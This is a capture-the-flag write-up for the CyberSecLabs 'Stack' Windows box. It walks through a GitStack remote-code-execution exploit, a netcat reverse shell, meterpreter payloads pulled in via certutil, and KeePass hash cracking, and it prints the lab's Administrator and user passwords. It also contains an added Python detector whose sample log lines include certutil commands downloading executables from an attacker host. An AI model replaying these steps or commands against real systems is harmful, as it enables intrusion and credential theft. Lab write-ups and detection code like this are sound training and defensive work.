Stack
https://www.cyberseclabs.co.uk/labs/info/Stack/
Scanning and Enumeration
Nmap
Running an initial Nmap scan with the -A switch produces the following.
Port 445 (SMB)
First up we can check against SMB with null authentication. I was unable to authenticate unfortunately with various tools.
Enum4linux also aborted due to null authentication errors.
Port 80 (HTTP)
Port is open so we can start with Gobuster and Nikto to see what information we can initially pull before physically browsing to the webpage.
The root page takes us to the following when browsing to http://172.31.1.12 in a web browser.
The Firefox extension 'Wappalyzer' confirms the following information regarding the webpage.
Dirb
I did not get results from Gobuster, so I decided to use a recursive directory enumeration tool. On finding the /web/ directory, dirb then found /web/index.php.
After browsing to the directory we come to the following page.
Exploitation
After searching around this I found nothing of interest and dead ends. We do have a name in the tab of 'GitStack Web'.
After searching on Google we come to the following hosted on exploit-db.com
This is a python script in which all we need to do is change the IP and the command we want to execute. This should hopefully give us remote command execution on the server.
We can run the script and confirm remote code execution with the ipconfig command.
Reverse Shell as user
We should now attempt to gain a proper reverse shell so we can enumerate the server properly.
I started off by opening a Python SimpleHttpServer in a directory that hosts nc.exe.
Then I edited the exploit to download the nc.exe file from my attacking machine.
I then created a netcat listener on my attacking machine in preparation for the next step.
Now we can edit the command in the exploit to call the nc.exe we uploaded back to the listener running on our attacking machine.
After executing the exploit we manage to get a reverse shell and confirm the user we are running as.
Privilege Escalation
I then downloaded winPEAS.exe with certutil.exe from my attacking machine.
After running it we can see that we have the 'SeImpersonatePrivilege' set.
I then ran the systeminfo command on the system to check the OS version.
As we are running Windows Server 2012 R2 Standard and have the SeImpersonatePrivilege we can more than likely run a juicy / rotten potato attack to escalate our privileges.
I ran the systeminfo command output against Windows-exploit-suggester.py, which reinforced that we can likely perform this type of attack for privilege escalation.
I previously covered a JuicyPotato attack in my writeup for HackTheBox's Bart. That was done without Metasploit, so I will take this opportunity to include the attack with Metasploit in a writeup.
First I created a payload for meterpreter with msfvenom.
I then downloaded the payload on to the machine with certutil.exe.
I then ran the exploit/multi/handler module in Metasploit, set the correct information and set the payload to be the exact same as the one specified in the msfvenom command. Once the listener was set up and running I executed the uploaded payload on the server.
I tried multiple times to get the Metasploit module working for JuicyPotato and could not get a valid CLSID to perform the escalation with.
At this point it could take a while to find the correct CLSID to use against this server, so I want to explore other attack vectors first.
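Both payload transfers in this section (winPEAS.exe and the meterpreter payload) go through certutil.exe, a signed Windows binary whose URL-fetch mode is one of the most commonly monitored "living off the land" patterns. The following is an added example, not code from the writeup or from the lab: it runs a simple detection over constructed process-creation events laid out to resemble a flattened Sysmon Event ID 1 export (the pipe-separated field layout and the sample hosts, users and URLs are all assumptions).

```python
"""Flag certutil.exe used as a file downloader in process-creation logs.

Added example, not part of the original writeup. The events below are
constructed to resemble a flattened Sysmon Event ID 1 (process creation)
export in the form "time | user | image path | command line"; that layout
is an assumption made for the example.
"""
import re
from dataclasses import dataclass

# Constructed sample events (not real telemetry). Two are downloads via
# certutil, the others are legitimate certutil and unrelated activity.
SAMPLE_EVENTS = [
    "2021-03-01T10:00:01 | CORP\\svc_git | C:\\Windows\\System32\\certutil.exe | "
    "certutil.exe -urlcache -split -f http://10.0.0.5/winPEAS.exe C:\\Users\\Public\\w.exe",
    "2021-03-01T10:00:02 | CORP\\admin | C:\\Windows\\System32\\certutil.exe | "
    "certutil -verify C:\\certs\\webserver.cer",
    "2021-03-01T10:00:03 | CORP\\svc_git | C:\\Windows\\System32\\certutil.exe | "
    "certutil.exe -urlcache -f http://10.0.0.5/shell.exe payload.exe",
    "2021-03-01T10:00:04 | CORP\\svc_git | C:\\Windows\\System32\\cmd.exe | "
    "cmd.exe /c whoami /priv",
    "2021-03-01T10:00:05 | CORP\\admin | C:\\Windows\\System32\\certutil.exe | "
    "certutil -decode C:\\temp\\blob.b64 C:\\temp\\out.exe",
]

# certutil accepts both '-' and '/' as the switch prefix, so match either.
URLCACHE_FLAG = re.compile(r"(?:^|\s)[-/]urlcache\b", re.IGNORECASE)
URL_PATTERN = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass
class Alert:
    time: str
    user: str
    url: str
    command_line: str


def parse_event(line):
    """Split one constructed log line into its four fields."""
    time, user, image, cmdline = (part.strip() for part in line.split("|", 3))
    return {"time": time, "user": user, "image": image, "cmdline": cmdline}


def is_certutil_download(image, cmdline):
    """True when certutil.exe is launched in URL-fetch mode against an http(s) URL.

    Matching on the image name alone misses a renamed copy of the binary; in
    real Sysmon data the OriginalFileName field closes that gap.
    """
    if image.rsplit("\\", 1)[-1].lower() != "certutil.exe":
        return False
    return bool(URLCACHE_FLAG.search(cmdline)) and bool(URL_PATTERN.search(cmdline))


def detect(events):
    """Return one Alert per event that looks like a certutil download."""
    alerts = []
    for line in events:
        ev = parse_event(line)
        if is_certutil_download(ev["image"], ev["cmdline"]):
            url = URL_PATTERN.search(ev["cmdline"]).group(0)
            alerts.append(Alert(ev["time"], ev["user"], url, ev["cmdline"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert.time} {alert.user} fetched {alert.url}: {alert.command_line}")
```

Run against the constructed events, the two URL-fetch invocations are flagged while the certificate verification and the base64 decode are not. In this lab the interesting context is the account: a web service account such as the one running GitStack has no business fetching executables, so alerting on the user field adds signal beyond the command line itself.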
One of the interesting bits of information I found earlier was a file called 'password_manager.kdbx'.
After performing a Google search the file extension belongs to KeePass which is a password manager. The file appears to be a database file.
After searching for exploits involving the KeePass database file I found some blog posts showing that we can convert the KeePass database file into a hash with a John the Ripper module called keepass2john, which we can then attempt to crack.
Since we are already in a meterpreter shell we can just run the download command with the path of the KeePass database to download.
We can then run the keepass2john command on Kali to convert the file to a hash format.
We can then check John for available formats.
We can then run John against the hash with the --format=KeePass switch.
Now that John has cracked the password 'princess' we can install KeePass2 and see if we can open the database file with it.
Once downloaded, open KeePass2 and load the database file. You will then be presented with a credentials screen to open the database.
We can then open the Administrators profile and view the stored password.
John's password:
We now have credentials to the following:
Administrator:secur3_apass262
John:whLd49NnsDWRJ7KW
I actually tried cracking the NTLMv2 hash for the John account much earlier on, before I noticed a KeePass file on the system. I captured it by setting up an SMB server on my attacking machine and getting the user account to authenticate against it. Makes sense I could not crack it when the password is that strong.
Since RDP is open I connected as the Administrator account and was successful.
We can also log in with Evil-WinRM as port 5985 is open.